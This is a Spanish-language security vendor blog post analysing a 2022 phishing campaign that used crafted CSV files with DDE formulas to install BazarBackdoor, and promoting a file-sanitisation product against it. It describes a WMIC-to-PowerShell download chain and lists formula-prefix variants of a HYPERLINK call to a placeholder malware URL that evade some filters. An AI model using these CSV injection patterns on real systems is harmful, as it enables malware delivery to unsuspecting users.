En febrero de 2022, el investigador de malware Chris Campbell detectó una nueva campaña de phishing que utilizaba archivos de texto CSV (valores separados por comas) especialmente diseñados para infectar los dispositivos de los usuarios con el troyano BazarBackdoor. En esta entrada del blog, analizamos el escenario del ataque y te mostramos cómo prevenir este sofisticado ataque con la tecnología Deep CDR™
(Content Disarm and Reconstruction).
La táctica de ataque
En esta campaña de phishing, los ciberdelincuentes utilizaron un archivo CSV, un archivo de texto delimitado que almacena datos en formato tabular y utiliza una coma para separar los valores. Este tipo de archivo es una forma habitual de intercambiar datos sencillos entre bases de datos y aplicaciones. Dado que un archivo CSV contiene simplemente texto sin código ejecutable, muchos usuarios piensan que es inofensivo y abren el documento rápidamente sin precaución. No sospechan que el archivo podría ser un vector de amenaza a través del cual el malware puede introducirse en sus dispositivos si el archivo CSV se abre con aplicaciones que admiten el Intercambio Dinámico de Datos (DDE), como Microsoft Excel y OpenOffice Calc. Estas aplicaciones pueden ejecutar las fórmulas y funciones del archivo CSV. Los autores de las amenazas abusan de esta característica DDE para ejecutar comandos arbitrarios, que descargan e instalan el troyano BazarBackdoor, con el fin de comprometer y obtener acceso completo a las redes corporativas desde el dispositivo de la víctima desprevenida. En comparación con los métodos de ataque habituales que utilizan una macro maliciosa o código VBA oculto en un archivo de MS Office, las amenazas ocultas dentro de documentos DDE son más difíciles de detectar.
Al examinar detenidamente el archivo, podemos ver un comando =WmiC| (comando de la interfaz de administración de Windows) incluido en una de las columnas de datos. Si las víctimas permiten inadvertidamente que se ejecute esta función DDE, se creará un comando de PowerShell. A continuación, los comandos abrirán una URL remota para descargar un BazarLoader y se instalará BazarBackdoor en el equipo de la víctima.

Cómo te ayuda la tecnología Deep CDR™ a protegerte contra los ataques DDE
Puede proteger su red frente a estas sofisticadas campañas de phishing mediante la desinfección de los archivos adjuntos a los correos electrónicos antes de que lleguen a sus usuarios. Partiendo de la premisa de que todo archivo representa una amenaza potencial y centrándose en la prevención más que en la mera detección, la tecnología Deep CDR™ elimina todo el contenido activo de los archivos, al tiempo que mantiene su usabilidad y funcionalidad. La tecnología Deep CDR™ es una de las seis tecnologías clave de MetaDefender la plataforma avanzada de prevención de amenazas OPSWATque realmente adopta la filosofía Zero Trust.
A continuación se detallan los datos de la desinfección tras procesar el archivo CSV infectado con MetaDefender Core también puede consultar el resultadodel análisis en MetaDefender Cloud). La tecnología Deep CDR™ neutralizó la fórmula del archivo, por lo que no se creó ningún comando de PowerShell. De este modo, no fue posible descargar el malware.

En ataques similares, los autores de las amenazas utilizan fórmulas más complejas para eludir la detección. Normalmente, las fórmulas en MS Excel comienzan con el signo igual (=). Sin embargo, dado que esta aplicación también admite fórmulas que comienzan con un signo diferente, como «=+» o «@», en lugar de solo «=», la fórmula destructiva en los archivos CSV puede ser:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")

Este tipo de fórmulas pueden eludir algunos sistemas CDR habituales. Sin embargo, la tecnología Deep CDR™ es capaz de hacer frente fácilmente a esta táctica y generar archivos limpios y seguros para su uso, neutralizando así la amenaza.
Obtenga más información sobrela tecnología Deep CDR™ o hable con un experto OPSWAT para descubrir las mejores soluciones de seguridad con las que proteger su red corporativa y a sus usuarios frente a ataques de día cero y malware avanzado capaz de eludir los sistemas de detección.
